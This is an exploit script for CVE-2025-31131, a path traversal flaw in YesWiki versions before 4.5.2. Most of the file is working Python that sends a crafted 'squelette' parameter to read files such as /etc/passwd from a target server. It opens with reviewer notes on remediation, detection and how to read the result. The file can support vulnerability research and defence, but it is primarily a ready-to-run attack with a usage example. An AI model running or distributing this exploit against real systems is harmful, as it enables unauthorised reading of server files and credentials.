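# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
# YesWiki before version 4.5.2 is vulnerable to unauthenticated path traversal
# via the 'squelette' parameter.
# A remote attacker can exploit this issue to read arbitrary files on the
# server, such as /etc/passwd.
#
# Reviewer notes:
# - Remediation: the header lists only versions before 4.5.2 as affected, so
#   upgrading to 4.5.2 or later is the fix this advisory implies.
# - Detection: the request built below is a plain GET whose query string
#   carries `squelette=` followed by a run of `../` and a file name with its
#   slashes written as `%2f`. Web access logs and WAF rules can key on
#   `squelette` values containing `..` or an encoded or literal path
#   separator, which a normal template selection is unlikely to need
#   (confirm against your own traffic).
# - Result interpretation: the success check in exploit() looks for the
#   literal "root:" and is therefore only meaningful for /etc/passwd-style
#   files; see the comment at that check.

import requests
import sys


def banner():
    """Print the tool banner to stdout."""
    print("=" * 80)
    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal (CVE-2025-31131)")
    print(" Exploit Author: Al Baradi Joy")
    print("=" * 80)


def exploit(target, filename="/etc/passwd"):
    """Send one traversal request for *filename* to *target* and print the outcome.

    Args:
        target: Base URL or bare host of the YesWiki instance. When no
            ``http://`` or ``https://`` prefix is present, ``http://`` is
            prepended.
        filename: Absolute path of the file to request. Defaults to
            ``/etc/passwd``.

    Returns:
        None. The result is reported on stdout only.
    """
    # Match the full scheme prefix: a bare startswith("http") would treat a
    # host name such as "httpd.example" as already carrying a scheme.
    if not target.startswith(("http://", "https://")):
        target = "http://" + target

    # Eight literal "../" segments, followed by the file name with only its
    # slashes percent-encoded.
    traversal = "../" * 8
    encoded_file = filename.replace("/", "%2f")
    payload = f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
    url = target.rstrip("/") + payload

    try:
        print(f"[+] Target: {target}")
        print(f"[+] Attempting to read: {filename}")
        response = requests.get(url, timeout=10)

        # The success heuristic is tied to the default /etc/passwd target: it
        # needs HTTP 200 *and* the literal "root:" in the body. For any other
        # file this branch reports failure even if the file was returned, so a
        # "failed" result is not evidence that a host is patched.
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful. File contents:\n")
            print(response.text)
        else:
            print("[!] Exploit failed or file not readable.")
            print(f"Status Code: {response.status_code}")
            # Only short bodies are echoed, to keep the output readable.
            if len(response.text) < 200:
                print(f"Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        # Covers connection errors, timeouts and other request-level failures.
        print(f"[!] Request failed: {e}")


if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        # The target is the required first argument; the file is optional.
        print(f"Usage: python3 {sys.argv[0]} <target> [file_to_read]")
        print(f"Example: python3 {sys.argv[0]} http://victim.com /etc/passwd")
        sys.exit(1)
    target_url = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    exploit(target_url, file_to_read)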